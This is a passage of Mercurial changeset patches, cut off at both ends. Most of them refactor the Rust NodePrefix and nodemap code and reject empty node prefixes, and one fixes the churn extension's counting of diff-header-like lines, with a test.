NodeMapError::RevisionNotInIndex(r) => rev_not_in_index(py, r), - NodeMapError::InvalidNodePrefix(s) => invalid_node_prefix(py, &s), + NodeMapError::InvalidNodePrefix => { + PyErr::new::<ValueError, _>(py, "Invalid node or prefix") + } } } -fn invalid_node_prefix(py: Python, ne: &NodeError) -> PyErr { - PyErr::new::<ValueError, _>( - py, - format!("Invalid node or prefix: {:?}", ne), - ) -} - /// Create the module, with __package__ given from parent pub fn init_module(py: Python, package: &str) -> PyResult<PyModule> { let dotted_name = &format!("{}.revlog", package); # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611574300 -3600 # Mon Jan 25 12:31:40 2021 +0100 # Node ID e61c2dc6e1c2fbbbc0a1402adfccbd50c0485f63 # Parent 5893706af3decde7b3a63ec4b4fa188d02cddecb rust: Exclude empty node prefixes We presumably don’t want `--rev ""` to select every single revision, even though the 
empty string is a prefix of all strings. Differential Revision: https://phab.mercurial-scm.org/D9862 diff --git a/rust/hg-core/src/revlog/node.rs b/rust/hg-core/src/revlog/node.rs --- a/rust/hg-core/src/revlog/node.rs +++ b/rust/hg-core/src/revlog/node.rs @@ -160,7 +160,7 @@ pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Self, FromHexError> { let hex = hex.as_ref(); let len = hex.len(); - if len > NODE_NYBBLES_LENGTH { + if len > NODE_NYBBLES_LENGTH || len == 0 { return Err(FromHexError); } @@ -201,10 +201,6 @@ } } - pub fn is_empty(&self) -> bool { - self.len() == 0 - } - pub fn is_prefix_of(&self, node: &Node) -> bool { if self.is_odd { let buf = self.buf; # HG changeset patch # User Aay Jay Chan <aayjaychan@itopia.com.hk> # Date 1612002611 -28800 # Sat Jan 30 18:30:11 2021 +0800 # Node ID b84c3d43ff2ec1dee2cbb244af4d500bf8d24947 # Parent e61c2dc6e1c2fbbbc0a1402adfccbd50c0485f63 churn: count lines that look like diff headers but are not Previously, churn cannot count added lines that start with "++ " or removed lines that start with "-- ". Differential Revision: https://phab.mercurial-scm.org/D9929 diff --git a/hgext/churn.py b/hgext/churn.py --- a/hgext/churn.py +++ b/hgext/churn.py @@ -38,11 +38,16 @@ def changedlines(ui, repo, ctx1, ctx2, fmatch): added, removed = 0, 0 diff = b''.join(patch.diff(repo, ctx1.node(), ctx2.node(), fmatch)) + inhunk = False for l in diff.split(b'\n'): - if l.startswith(b"+") and not l.startswith(b"+++ "): + if inhunk and l.startswith(b"+"): added += 1 - elif l.startswith(b"-") and not l.startswith(b"--- "): + elif inhunk and l.startswith(b"-"): removed += 1 + elif l.startswith(b"@"): + inhunk = True + elif l.startswith(b"d"): + inhunk = False return (added, removed) diff --git a/tests/test-churn.t b/tests/test-churn.t --- a/tests/test-churn.t +++ b/tests/test-churn.t @@ -195,3 +195,22 @@ alltogether 11 ********************************************************* $ cd .. 
+ +count lines that look like headings but are not + + $ hg init not-headers + $ cd not-headers + $ cat > a <<EOF + > diff + > @@ -195,3 +195,21 @@ + > -- a/tests/test-churn.t + > ++ b/tests/test-churn.t + > EOF + $ hg ci -Am adda -u user1 + adding a + $ hg churn --diffstat + user1 +4/-0 ++++++++++++++++++++++++++++++++++++++++++++++++++++++ + $ hg rm a + $ hg ci -Am removea -u user1 + $ hg churn --diffstat + user1 +4/-4 +++++++++++++++++++++++++++--------------------------- # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611571727 -3600 # Mon Jan 25 11:48:47 2021 +0100 # Node ID 645ee7225fab310a7a153aa1f5dbef7dd0b6cd56 # Parent b84c3d43ff2ec1dee2cbb244af4d500bf8d24947 rust: Make NodePrefix allocation-free and Copy, remove NodePrefixRef The `*Ref` struct only existed to avoid allocating `Vec`s when cloning `NodePrefix`, but we can avoid having `Vec` in the first place by using an inline array instead. This makes `NodePrefix` 21 bytes (with 1 for the length) which is smaller than before as `Vec` alone is 24 bytes. 
Differential Revision: https://phab.mercurial-scm.org/D9863 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -286,11 +286,6 @@ ] [[package]] -name = "hex" -version = "0.4.2" -source = "registry+https://github.com/rust-lang/crates.io-index" - -[[package]] name = "hg-core" version = "0.1.0" dependencies = [ @@ -300,7 +295,6 @@ "crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)", "flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)", "format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)", - "hex 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)", "im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)", "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", @@ -956,7 +950,6 @@ "checksum getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)" = "fc587bc0ec293155d5bfa6b9891ec18a1e330c234f896ea47fbada4cadbe47e6" "checksum glob 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "9b919933a397b79c37e33b77bb2aa3dc8eb6e165ad809e58ff75bc7db2e34574" "checksum hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)" = "5aca5565f760fb5b220e499d72710ed156fdb74e631659e99377d9ebfbd13ae8" -"checksum hex 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)" = "644f9158b2f133fd50f5fb3242878846d9eb792e445c893805ff0e3824006e35" "checksum humantime 1.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "df004cfca50ef23c36850aaaa59ad52cc70d0e90243c3c7737a4dd32dc7a3c4f" "checksum im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "3ca8957e71f04a205cb162508f9326aea04676c8dfd0711220190d6b83664f3f" "checksum itertools 0.9.0 (registry+https://github.com/rust-lang/crates.io-index)" = "284f18f85651fe11e8a991b2adb42cb078325c996ed026d994719efcfca1d54b" diff --git 
a/rust/hg-core/Cargo.toml b/rust/hg-core/Cargo.toml --- a/rust/hg-core/Cargo.toml +++ b/rust/hg-core/Cargo.toml @@ -11,7 +11,6 @@ [dependencies] bytes-cast = "0.1" byteorder = "1.3.4" -hex = "0.4.2" im-rc = "15.0.*" lazy_static = "1.4.0" memchr = "2.3.3" diff --git a/rust/hg-core/src/operations/cat.rs b/rust/hg-core/src/operations/cat.rs --- a/rust/hg-core/src/operations/cat.rs +++ b/rust/hg-core/src/operations/cat.rs @@ -88,13 +88,13 @@ _ => { let changelog_node = NodePrefix::from_hex(&rev) .map_err(|_| CatRevErrorKind::InvalidRevision)?; - changelog.get_node(changelog_node.borrow())? + changelog.get_node(changelog_node)? } }; let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) .map_err(|_| CatRevErrorKind::CorruptedRevlog)?; - let manifest_entry = manifest.get_node((&manifest_node).into())?; + let manifest_entry = manifest.get_node(manifest_node.into())?; let mut bytes = vec![]; for (manifest_file, node_bytes) in manifest_entry.files_with_nodes() { @@ -107,7 +107,7 @@ Revlog::open(repo, &index_path, Some(&data_path))?; let file_node = Node::from_hex(node_bytes) .map_err(|_| CatRevErrorKind::CorruptedRevlog)?; - let file_rev = file_log.get_node_rev((&file_node).into())?; + let file_rev = file_log.get_node_rev(file_node.into())?; let data = file_log.get_rev_data(file_rev)?; if data.starts_with(&METADATA_DELIMITER) { let end_delimiter_position = data diff --git a/rust/hg-core/src/operations/debugdata.rs b/rust/hg-core/src/operations/debugdata.rs --- a/rust/hg-core/src/operations/debugdata.rs +++ b/rust/hg-core/src/operations/debugdata.rs @@ -93,7 +93,7 @@ _ => { let node = NodePrefix::from_hex(&rev) .map_err(|_| DebugDataErrorKind::InvalidRevision)?; - let rev = revlog.get_node_rev(node.borrow())?; + let rev = revlog.get_node_rev(node)?; revlog.get_rev_data(rev)? 
} }; diff --git a/rust/hg-core/src/operations/list_tracked_files.rs b/rust/hg-core/src/operations/list_tracked_files.rs --- a/rust/hg-core/src/operations/list_tracked_files.rs +++ b/rust/hg-core/src/operations/list_tracked_files.rs @@ -147,12 +147,12 @@ _ => { let changelog_node = NodePrefix::from_hex(&rev) .or(Err(ListRevTrackedFilesErrorKind::InvalidRevision))?; - changelog.get_node(changelog_node.borrow())? + changelog.get_node(changelog_node)? } }; let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) .or(Err(ListRevTrackedFilesErrorKind::CorruptedRevlog))?; - let manifest_entry = manifest.get_node((&manifest_node).into())?; + let manifest_entry = manifest.get_node(manifest_node.into())?; Ok(FilesForRev(manifest_entry)) } diff --git a/rust/hg-core/src/revlog.rs b/rust/hg-core/src/revlog.rs --- a/rust/hg-core/src/revlog.rs +++ b/rust/hg-core/src/revlog.rs @@ -9,7 +9,7 @@ pub mod nodemap; mod nodemap_docket; pub mod path_encode; -pub use node::{FromHexError, Node, NodePrefix, NodePrefixRef}; +pub use node::{FromHexError, Node, NodePrefix}; pub mod changelog; pub mod index; pub mod manifest; diff --git a/rust/hg-core/src/revlog/changelog.rs b/rust/hg-core/src/revlog/changelog.rs --- a/rust/hg-core/src/revlog/changelog.rs +++ b/rust/hg-core/src/revlog/changelog.rs @@ -1,6 +1,6 @@ use crate::repo::Repo; use crate::revlog::revlog::{Revlog, RevlogError}; -use crate::revlog::NodePrefixRef; +use crate::revlog::NodePrefix; use crate::revlog::Revision; /// A specialized `Revlog` to work with `changelog` data format. @@ -19,7 +19,7 @@ /// Return the `ChangelogEntry` a given node id. 
pub fn get_node( &self, - node: NodePrefixRef, + node: NodePrefix, ) -> Result<ChangelogEntry, RevlogError> { let rev = self.revlog.get_node_rev(node)?; self.get_rev(rev) diff --git a/rust/hg-core/src/revlog/manifest.rs b/rust/hg-core/src/revlog/manifest.rs --- a/rust/hg-core/src/revlog/manifest.rs +++ b/rust/hg-core/src/revlog/manifest.rs @@ -1,6 +1,6 @@ use crate::repo::Repo; use crate::revlog::revlog::{Revlog, RevlogError}; -use crate::revlog::NodePrefixRef; +use crate::revlog::NodePrefix; use crate::revlog::Revision; use crate::utils::hg_path::HgPath; @@ -20,7 +20,7 @@ /// Return the `ManifestEntry` of a given node id. pub fn get_node( &self, - node: NodePrefixRef, + node: NodePrefix, ) -> Result<ManifestEntry, RevlogError> { let rev = self.revlog.get_node_rev(node)?; self.get_rev(rev) diff --git a/rust/hg-core/src/revlog/node.rs b/rust/hg-core/src/revlog/node.rs --- a/rust/hg-core/src/revlog/node.rs +++ b/rust/hg-core/src/revlog/node.rs @@ -9,8 +9,7 @@ //! of a revision. use bytes_cast::BytesCast; -use hex::{self, FromHex}; -use std::convert::TryFrom; +use std::convert::{TryFrom, TryInto}; use std::fmt; /// The length in bytes of a `Node` @@ -50,7 +49,7 @@ /// the size or return an error at runtime. 
/// /// [`nybbles_len`]: #method.nybbles_len -#[derive(Clone, Debug, PartialEq, BytesCast)] +#[derive(Copy, Clone, Debug, PartialEq, BytesCast)] #[repr(transparent)] pub struct Node { data: NodeData, @@ -72,7 +71,7 @@ type Error = (); #[inline] - fn try_from(bytes: &'a [u8]) -> Result<&'a Node, Self::Error> { + fn try_from(bytes: &'a [u8]) -> Result<Self, Self::Error> { match Node::from_bytes(bytes) { Ok((node, rest)) if rest.is_empty() => Ok(node), _ => Err(()), @@ -80,6 +79,17 @@ } } +/// Return an error if the slice has an unexpected length +impl TryFrom<&'_ [u8]> for Node { + type Error = std::array::TryFromSliceError; + + #[inline] + fn try_from(bytes: &'_ [u8]) -> Result<Self, Self::Error> { + let data = bytes.try_into()?; + Ok(Self { data }) + } +} + impl fmt::LowerHex for Node { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { for &byte in &self.data { @@ -124,9 +134,12 @@ /// To be used in FFI and I/O only, in order to facilitate future /// changes of hash format. pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Node, FromHexError> { - Ok(NodeData::from_hex(hex.as_ref()) - .map_err(|_| FromHexError)? - .into()) + let prefix = NodePrefix::from_hex(hex)?; + if prefix.nybbles_len() == NODE_NYBBLES_LENGTH { + Ok(Self { data: prefix.data }) + } else { + Err(FromHexError) + } } /// Provide access to binary data @@ -143,10 +156,14 @@ /// Since it can potentially come from an hexadecimal representation with /// odd length, it needs to carry around whether the last 4 bits are relevant /// or not. -#[derive(Debug, PartialEq)] +#[derive(Debug, PartialEq, Copy, Clone)] pub struct NodePrefix { - buf: Vec<u8>, - is_odd: bool, + /// In `1..=NODE_NYBBLES_LENGTH` + nybbles_len: u8, + /// The first `4 * length_in_nybbles` bits are used (considering bits + /// within a bytes in big-endian: most significant first), the rest + /// are zero. 
+ data: NodeData, } impl NodePrefix { @@ -164,52 +181,35 @@ return Err(FromHexError); } - let is_odd = len % 2 == 1; - let even_part = if is_odd { &hex[..len - 1] } else { hex }; - let mut buf: Vec<u8> = - Vec::from_hex(&even_part).map_err(|_| FromHexError)?; - - if is_odd { - let latest_char = char::from(hex[len - 1]); - let latest_nybble = - latest_char.to_digit(16).ok_or_else(|| FromHexError)? as u8; - buf.push(latest_nybble << 4); + let mut data = [0; NODE_BYTES_LENGTH]; + let mut nybbles_len = 0; + for &ascii_byte in hex { + let nybble = match char::from(ascii_byte).to_digit(16) { + Some(digit) => digit as u8, + None => return Err(FromHexError), + }; + // Fill in the upper half of a byte first, then the lower half. + let shift = if nybbles_len % 2 == 0 { 4 } else { 0 }; + data[nybbles_len as usize / 2] |= nybble << shift; + nybbles_len += 1; } - Ok(NodePrefix { buf, is_odd }) + Ok(Self { data, nybbles_len }) } - pub fn borrow(&self) -> NodePrefixRef { - NodePrefixRef { - buf: &self.buf, - is_odd: self.is_odd, - } - } -} - -#[derive(Clone, Debug, PartialEq)] -pub struct NodePrefixRef<'a> { - buf: &'a [u8], - is_odd: bool, -} - -impl<'a> NodePrefixRef<'a> { - pub fn len(&self) -> usize { - if self.is_odd { - self.buf.len() * 2 - 1 - } else { - self.buf.len() * 2 - } + pub fn nybbles_len(&self) -> usize { + self.nybbles_len as _ } pub fn is_prefix_of(&self, node: &Node) -> bool { - if self.is_odd { - let buf = self.buf; - let last_pos = buf.len() - 1; - node.data.starts_with(buf.split_at(last_pos).0) - && node.data[last_pos] >> 4 == buf[last_pos] >> 4 - } else { - node.data.starts_with(self.buf) + let full_bytes = self.nybbles_len() / 2; + if self.data[..full_bytes] != node.data[..full_bytes] { + return false; } + if self.nybbles_len() % 2 == 0 { + return true; + } + let last = self.nybbles_len() - 1; + self.get_nybble(last) == node.get_nybble(last) } /// Retrieve the `i`th half-byte from the prefix. 
@@ -217,8 +217,12 @@ /// This is also the `i`th hexadecimal digit in numeric form, /// also called a [nybble](https://en.wikipedia.org/wiki/Nibble). pub fn get_nybble(&self, i: usize) -> u8 { - assert!(i < self.len()); - get_nybble(self.buf, i) + assert!(i < self.nybbles_len()); + get_nybble(&self.data, i) + } + + fn iter_nybbles(&self) -> impl Iterator<Item = u8> + '_ { + (0..self.nybbles_len()).map(move |i| get_nybble(&self.data, i)) } /// Return the index first nybble that's different from `node` @@ -229,42 +233,49 @@ /// /// Returned index is as in `get_nybble`, i.e., starting at 0. pub fn first_different_nybble(&self, node: &Node) -> Option<usize> { - let buf = self.buf; - let until = if self.is_odd { - buf.len() - 1 - } else { - buf.len() - }; - for (i, item) in buf.iter().enumerate().take(until) { - if *item != node.data[i] { - return if *item & 0xf0 == node.data[i] & 0xf0 { - Some(2 * i + 1) - } else { - Some(2 * i) - }; - } + self.iter_nybbles() + .zip(NodePrefix::from(*node).iter_nybbles()) + .position(|(a, b)| a != b) + } +} + +impl fmt::LowerHex for NodePrefix { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + let full_bytes = self.nybbles_len() / 2; + for &byte in &self.data[..full_bytes] { + write!(f, "{:02x}", byte)? } - if self.is_odd && buf[until] & 0xf0 != node.data[until] & 0xf0 { - Some(until * 2) - } else { - None + if self.nybbles_len() % 2 == 1 { + let last = self.nybbles_len() - 1; + write!(f, "{:x}", self.get_nybble(last))? 
+ } + Ok(()) + } +} + +/// A shortcut for full `Node` references +impl From<&'_ Node> for NodePrefix { + fn from(node: &'_ Node) -> Self { + NodePrefix { + nybbles_len: node.nybbles_len() as _, + data: node.data, } } } /// A shortcut for full `Node` references -impl<'a> From<&'a Node> for NodePrefixRef<'a> { - fn from(node: &'a Node) -> Self { - NodePrefixRef { - buf: &node.data, - is_odd: false, +impl From<Node> for NodePrefix { + fn from(node: Node) -> Self { + NodePrefix { + nybbles_len: node.nybbles_len() as _, + data: node.data, } } } -impl PartialEq<Node> for NodePrefixRef<'_> { +impl PartialEq<Node> for NodePrefix { fn eq(&self, other: &Node) -> bool { - !self.is_odd && self.buf == other.data + Self::from(*other) == *self } } @@ -272,18 +283,16 @@ mod tests { use super::*; - fn sample_node() -> Node { - let mut data = [0; NODE_BYTES_LENGTH]; - data.copy_from_slice(&[ + const SAMPLE_NODE_HEX: &str = "0123456789abcdeffedcba9876543210deadbeef"; + const SAMPLE_NODE: Node = Node { + data: [ 0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef, 0xfe, 0xdc, 0xba, 0x98, 0x76, 0x54, 0x32, 0x10, 0xde, 0xad, 0xbe, 0xef, - ]); - data.into() - } + ], + }; /// Pad an hexadecimal string to reach `NODE_NYBBLES_LENGTH` - ///check_hash - /// The padding is made with zeros + /// The padding is made with zeros. pub fn hex_pad_right(hex: &str) -> String { let mut res = hex.to_string(); while res.len() < NODE_NYBBLES_LENGTH { @@ -292,55 +301,30 @@ res } - fn sample_node_hex() -> String { - hex_pad_right("0123456789abcdeffedcba9876543210deadbeef") - } - #[test] fn test_node_from_hex() { - assert_eq!(Node::from_hex(&sample_node_hex()).unwrap(), sample_node()); - - let mut short = hex_pad_right("0123"); - short.pop(); - short.pop(); - assert!(Node::from_hex(&short).is_err()); - - let not_hex = hex_pad_right("012... oops"); - assert!(Node::from_hex(¬_hex).is_err(),); + let not_hex = "012... 
oops"; + let too_short = "0123"; + let too_long = format!("{}0", SAMPLE_NODE_HEX); + assert_eq!(Node::from_hex(SAMPLE_NODE_HEX).unwrap(), SAMPLE_NODE); + assert!(Node::from_hex(not_hex).is_err()); + assert!(Node::from_hex(too_short).is_err()); + assert!(Node::from_hex(&too_long).is_err()); } #[test] fn test_node_encode_hex() { - assert_eq!(format!("{:x}", sample_node()), sample_node_hex()); + assert_eq!(format!("{:x}", SAMPLE_NODE), SAMPLE_NODE_HEX); } #[test] - fn test_prefix_from_hex() -> Result<(), FromHexError> { - assert_eq!( - NodePrefix::from_hex("0e1")?, - NodePrefix { - buf: vec![14, 16], - is_odd: true - } - ); + fn test_prefix_from_to_hex() -> Result<(), FromHexError> { + assert_eq!(format!("{:x}", NodePrefix::from_hex("0e1")?), "0e1"); + assert_eq!(format!("{:x}", NodePrefix::from_hex("0e1a")?), "0e1a"); assert_eq!( - NodePrefix::from_hex("0e1a")?, - NodePrefix { - buf: vec![14, 26], - is_odd: false - } + format!("{:x}", NodePrefix::from_hex(SAMPLE_NODE_HEX)?), + SAMPLE_NODE_HEX ); - - // checking limit case - let node_as_vec = sample_node().data.iter().cloned().collect(); - assert_eq!( - NodePrefix::from_hex(sample_node_hex())?, - NodePrefix { - buf: node_as_vec, - is_odd: false - } - ); - Ok(()) } @@ -358,49 +342,47 @@ node_data[0] = 0x12; node_data[1] = 0xca; let node = Node::from(node_data); - assert!(NodePrefix::from_hex("12")?.borrow().is_prefix_of(&node)); - assert!(!NodePrefix::from_hex("1a")?.borrow().is_prefix_of(&node)); - assert!(NodePrefix::from_hex("12c")?.borrow().is_prefix_of(&node)); - assert!(!NodePrefix::from_hex("12d")?.borrow().is_prefix_of(&node)); + assert!(NodePrefix::from_hex("12")?.is_prefix_of(&node)); + assert!(!NodePrefix::from_hex("1a")?.is_prefix_of(&node)); + assert!(NodePrefix::from_hex("12c")?.is_prefix_of(&node)); + assert!(!NodePrefix::from_hex("12d")?.is_prefix_of(&node)); Ok(()) } #[test] fn test_get_nybble() -> Result<(), FromHexError> { let prefix = NodePrefix::from_hex("dead6789cafe")?; - 
assert_eq!(prefix.borrow().get_nybble(0), 13); - assert_eq!(prefix.borrow().get_nybble(7), 9); + assert_eq!(prefix.get_nybble(0), 13); + assert_eq!(prefix.get_nybble(7), 9); Ok(()) } #[test] fn test_first_different_nybble_even_prefix() { let prefix = NodePrefix::from_hex("12ca").unwrap(); - let prefref = prefix.borrow(); let mut node = Node::from([0; NODE_BYTES_LENGTH]); - assert_eq!(prefref.first_different_nybble(&node), Some(0)); + assert_eq!(prefix.first_different_nybble(&node), Some(0)); node.data[0] = 0x13; - assert_eq!(prefref.first_different_nybble(&node), Some(1)); + assert_eq!(prefix.first_different_nybble(&node), Some(1)); node.data[0] = 0x12; - assert_eq!(prefref.first_different_nybble(&node), Some(2)); + assert_eq!(prefix.first_different_nybble(&node), Some(2)); node.data[1] = 0xca; // now it is a prefix - assert_eq!(prefref.first_different_nybble(&node), None); + assert_eq!(prefix.first_different_nybble(&node), None); } #[test] fn test_first_different_nybble_odd_prefix() { let prefix = NodePrefix::from_hex("12c").unwrap(); - let prefref = prefix.borrow(); let mut node = Node::from([0; NODE_BYTES_LENGTH]); - assert_eq!(prefref.first_different_nybble(&node), Some(0)); + assert_eq!(prefix.first_different_nybble(&node), Some(0)); node.data[0] = 0x13; - assert_eq!(prefref.first_different_nybble(&node), Some(1)); + assert_eq!(prefix.first_different_nybble(&node), Some(1)); node.data[0] = 0x12; - assert_eq!(prefref.first_different_nybble(&node), Some(2)); + assert_eq!(prefix.first_different_nybble(&node), Some(2)); node.data[1] = 0xca; // now it is a prefix - assert_eq!(prefref.first_different_nybble(&node), None); + assert_eq!(prefix.first_different_nybble(&node), None); } } diff --git a/rust/hg-core/src/revlog/nodemap.rs b/rust/hg-core/src/revlog/nodemap.rs --- a/rust/hg-core/src/revlog/nodemap.rs +++ b/rust/hg-core/src/revlog/nodemap.rs @@ -13,8 +13,8 @@ //! is used in a more abstract context. 
use super::{ - node::NULL_NODE, FromHexError, Node, NodePrefix, NodePrefixRef, Revision, - RevlogIndex, NULL_REVISION, + node::NULL_NODE, FromHexError, Node, NodePrefix, Revision, RevlogIndex, + NULL_REVISION, }; use bytes_cast::{unaligned, BytesCast}; @@ -82,7 +82,7 @@ fn find_bin<'a>( &self, idx: &impl RevlogIndex, - prefix: NodePrefixRef<'a>, + prefix: NodePrefix, ) -> Result<Option<Revision>, NodeMapError>; /// Find the unique Revision whose `Node` hexadecimal string representation @@ -97,7 +97,7 @@ idx: &impl RevlogIndex, prefix: &str, ) -> Result<Option<Revision>, NodeMapError> { - self.find_bin(idx, NodePrefix::from_hex(prefix)?.borrow()) + self.find_bin(idx, NodePrefix::from_hex(prefix)?) } /// Give the size of the shortest node prefix that determines @@ -114,7 +114,7 @@ fn unique_prefix_len_bin<'a>( &self, idx: &impl RevlogIndex, - node_prefix: NodePrefixRef<'a>, + node_prefix: NodePrefix, ) -> Result<Option<usize>, NodeMapError>; /// Same as `unique_prefix_len_bin`, with the hexadecimal representation @@ -124,7 +124,7 @@ idx: &impl RevlogIndex, prefix: &str, ) -> Result<Option<usize>, NodeMapError> { - self.unique_prefix_len_bin(idx, NodePrefix::from_hex(prefix)?.borrow()) + self.unique_prefix_len_bin(idx, NodePrefix::from_hex(prefix)?) } /// Same as `unique_prefix_len_bin`, with a full `Node` as input @@ -278,7 +278,7 @@ /// Return `None` unless the `Node` for `rev` has given prefix in `index`. fn has_prefix_or_none( idx: &impl RevlogIndex, - prefix: NodePrefixRef, + prefix: NodePrefix, rev: Revision, ) -> Result<Option<Revision>, NodeMapError> { idx.node(rev) @@ -299,7 +299,7 @@ /// revision is the only one for a *subprefix* of the one being looked up. fn validate_candidate( idx: &impl RevlogIndex, - prefix: NodePrefixRef, + prefix: NodePrefix, candidate: (Option<Revision>, usize), ) -> Result<(Option<Revision>, usize), NodeMapError> { let (rev, steps) = candidate; @@ -426,7 +426,7 @@ /// `NodeTree`). 
fn lookup( &self, - prefix: NodePrefixRef, + prefix: NodePrefix, ) -> Result<(Option<Revision>, usize), NodeMapError> { for (i, visit_item) in self.visit(prefix).enumerate() { if let Some(opt) = visit_item.final_revision() { @@ -436,10 +436,7 @@ Err(NodeMapError::MultipleResults) } - fn visit<'n, 'p>( - &'n self, - prefix: NodePrefixRef<'p>, - ) -> NodeTreeVisitor<'n, 'p> { + fn visit<'n>(&'n self, prefix: NodePrefix) -> NodeTreeVisitor<'n> { NodeTreeVisitor { nt: self, prefix, @@ -617,9 +614,9 @@ } } -struct NodeTreeVisitor<'n, 'p> { +struct NodeTreeVisitor<'n> { nt: &'n NodeTree, - prefix: NodePrefixRef<'p>, + prefix: NodePrefix, visit: usize, nybble_idx: usize, done: bool, @@ -632,11 +629,11 @@ element: Element, } -impl<'n, 'p> Iterator for NodeTreeVisitor<'n, 'p> { +impl<'n> Iterator for NodeTreeVisitor<'n> { type Item = NodeTreeVisitItem; fn next(&mut self) -> Option<Self::Item> { - if self.done || self.nybble_idx >= self.prefix.len() { + if self.done || self.nybble_idx >= self.prefix.nybbles_len() { return None; } @@ -701,18 +698,18 @@ fn find_bin<'a>( &self, idx: &impl RevlogIndex, - prefix: NodePrefixRef<'a>, + prefix: NodePrefix, ) -> Result<Option<Revision>, NodeMapError> { - validate_candidate(idx, prefix.clone(), self.lookup(prefix)?) + validate_candidate(idx, prefix, self.lookup(prefix)?) .map(|(opt, _shortest)| opt) } fn unique_prefix_len_bin<'a>( &self, idx: &impl RevlogIndex, - prefix: NodePrefixRef<'a>, + prefix: NodePrefix, ) -> Result<Option<usize>, NodeMapError> { - validate_candidate(idx, prefix.clone(), self.lookup(prefix)?) + validate_candidate(idx, prefix, self.lookup(prefix)?) 
.map(|(opt, shortest)| opt.map(|_rev| shortest)) } } diff --git a/rust/hg-core/src/revlog/revlog.rs b/rust/hg-core/src/revlog/revlog.rs --- a/rust/hg-core/src/revlog/revlog.rs +++ b/rust/hg-core/src/revlog/revlog.rs @@ -11,7 +11,7 @@ use zstd; use super::index::Index; -use super::node::{NodePrefixRef, NODE_BYTES_LENGTH, NULL_NODE}; +use super::node::{NodePrefix, NODE_BYTES_LENGTH, NULL_NODE}; use super::nodemap; use super::nodemap::NodeMap; use super::nodemap_docket::NodeMapDocket; @@ -117,7 +117,7 @@ #[timed] pub fn get_node_rev( &self, - node: NodePrefixRef, + node: NodePrefix, ) -> Result<Revision, RevlogError> { if let Some(nodemap) = &self.nodemap { return nodemap diff --git a/rust/hg-cpython/src/revlog.rs b/rust/hg-cpython/src/revlog.rs --- a/rust/hg-cpython/src/revlog.rs +++ b/rust/hg-cpython/src/revlog.rs @@ -64,7 +64,7 @@ let nt = opt.as_ref().unwrap(); let idx = &*self.cindex(py).borrow(); let node = node_from_py_bytes(py, &node)?; - nt.find_bin(idx, (&node).into()).map_err(|e| nodemap_error(py, e)) + nt.find_bin(idx, node.into()).map_err(|e| nodemap_error(py, e)) } /// same as `get_rev()` but raises a bare `error.RevlogError` if node # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611595526 -3600 # Mon Jan 25 18:25:26 2021 +0100 # Node ID 18a261b11b202abc79f765c360bd76d204ec9fef # Parent 645ee7225fab310a7a153aa1f5dbef7dd0b6cd56 rust: Remove hex parsing from the nodemap Separating concerns simplifies error types. 
Differential Revision: https://phab.mercurial-scm.org/D9864 diff --git a/rust/hg-core/examples/nodemap/main.rs b/rust/hg-core/examples/nodemap/main.rs --- a/rust/hg-core/examples/nodemap/main.rs +++ b/rust/hg-core/examples/nodemap/main.rs @@ -49,7 +49,7 @@ fn query(index: &Index, nm: &NodeTree, prefix: &str) { let start = Instant::now(); - let res = nm.find_hex(index, prefix); + let res = NodePrefix::from_hex(prefix).map(|p| nm.find_bin(index, p)); println!("Result found in {:?}: {:?}", start.elapsed(), res); } diff --git a/rust/hg-core/src/revlog/nodemap.rs b/rust/hg-core/src/revlog/nodemap.rs --- a/rust/hg-core/src/revlog/nodemap.rs +++ b/rust/hg-core/src/revlog/nodemap.rs @@ -13,8 +13,7 @@ //! is used in a more abstract context. use super::{ - node::NULL_NODE, FromHexError, Node, NodePrefix, Revision, RevlogIndex, - NULL_REVISION, + node::NULL_NODE, Node, NodePrefix, Revision, RevlogIndex, NULL_REVISION, }; use bytes_cast::{unaligned, BytesCast}; @@ -27,17 +26,10 @@ #[derive(Debug, PartialEq)] pub enum NodeMapError { MultipleResults, - InvalidNodePrefix, /// A `Revision` stored in the nodemap could not be found in the index RevisionNotInIndex(Revision), } -impl From<FromHexError> for NodeMapError { - fn from(_: FromHexError) -> Self { - NodeMapError::InvalidNodePrefix - } -} - /// Mapping system from Mercurial nodes to revision numbers. /// /// ## `RevlogIndex` and `NodeMap` @@ -85,21 +77,6 @@ prefix: NodePrefix, ) -> Result<Option<Revision>, NodeMapError>; - /// Find the unique Revision whose `Node` hexadecimal string representation - /// starts with a given prefix - /// - /// If no Revision matches the given prefix, `Ok(None)` is returned. - /// - /// If several Revisions match the given prefix, a [`MultipleResults`] - /// error is returned. - fn find_hex( - &self, - idx: &impl RevlogIndex, - prefix: &str, - ) -> Result<Option<Revision>, NodeMapError> { - self.find_bin(idx, NodePrefix::from_hex(prefix)?) 
